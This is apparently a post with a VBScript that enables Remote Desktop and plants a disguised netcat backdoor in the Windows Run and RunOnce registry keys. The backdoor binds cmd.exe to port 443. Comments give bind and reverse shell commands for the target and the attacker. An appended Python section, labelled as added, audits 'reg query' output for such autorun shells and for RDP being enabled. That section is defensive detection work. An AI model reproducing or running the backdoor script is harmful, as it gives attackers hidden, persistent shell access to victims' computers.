Here is an example of a VBScript that enables Remote Desktop and plants a Trojan or backdoor (such as Netcat) in the registry, a technique also known as Persistent Netcat.
' This VBScript will do the following:
' 1. Enable Remote Desktop
' 2. Plant Trojan or Backdoor in the Registry
'
' Rename your Netcat (nc.exe) as winntsvr.exe as a "camouflage"
Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next
' Enable Remote Desktop
RegLocate = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
objShell.RegWrite RegLocate,"0","REG_DWORD"
' Plant Trojan or Backdoor in the Registry
RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"
RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"
' Bind Connect
' On the Target: winntsvr -v -L -p443 -d -e cmd.exe
' On the Attacker: nc -v 131.107.1.254 443
' Reverse Connect
' On the Target: winntsvr -v 131.107.1.222 443 -d -e cmd.exe
' On the Attacker: nc -v -l -p443
WScript.Quit
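
Both changes the script makes are visible in the registry and can be audited. The Python below is an added example, not part of the original post: it parses text in the layout printed by `reg query` (the sample is constructed, and the function names are illustrative) and flags Run/RunOnce values that start a listener or attach a command shell with -e, as well as fDenyTSConnections set to 0.

```python
import re

# Constructed sample in the layout printed by `reg query <key>`; not from a real host.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Update    REG_SZ    C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
    Update    REG_SZ    C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
"""

VALUE_LINE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
SHELL_EXEC = re.compile(r"(?:^|\s)-e\s+\"?\S*?(cmd|powershell)(\.exe)?\b", re.I)
LISTEN = re.compile(r"(?:^|\s)-l\b", re.I)
PORT = re.compile(r"(?:^|\s)-p\s*(\d+)", re.I)

def parse_reg_query(text):
    """Yield (key, value_name, type, data) tuples from `reg query` text output."""
    key = None
    for line in text.splitlines():
        if line.upper().startswith("HKEY_"):
            key = line.strip()
        elif key and (m := VALUE_LINE.match(line)):
            yield key, m.group(1), m.group(2), m.group(3).strip()

def audit(text):
    """Return (key, value_name, reason) for each suspicious registry value."""
    findings = []
    for key, name, typ, data in parse_reg_query(text):
        if AUTORUN_KEY.search(key):
            reasons = []
            if SHELL_EXEC.search(data):
                reasons.append("runs a command shell via -e")
            port = PORT.search(data)
            if LISTEN.search(data) and port:
                reasons.append(f"listens on port {port.group(1)}")
            if reasons:
                findings.append((key, name, "; ".join(reasons)))
        elif key.lower().endswith(r"\terminal server") and name.lower() == "fdenytsconnections":
            if typ == "REG_DWORD" and int(data, 16) == 0:
                findings.append((key, name, "Remote Desktop connections are allowed"))
    return findings

if __name__ == "__main__":
    for key, name, reason in audit(SAMPLE):
        print(f"{key}\\{name}: {reason}")
```

A value named after something routine, such as "Update", is not evidence of legitimacy; the check keys on what the command line does, not on the value or file name.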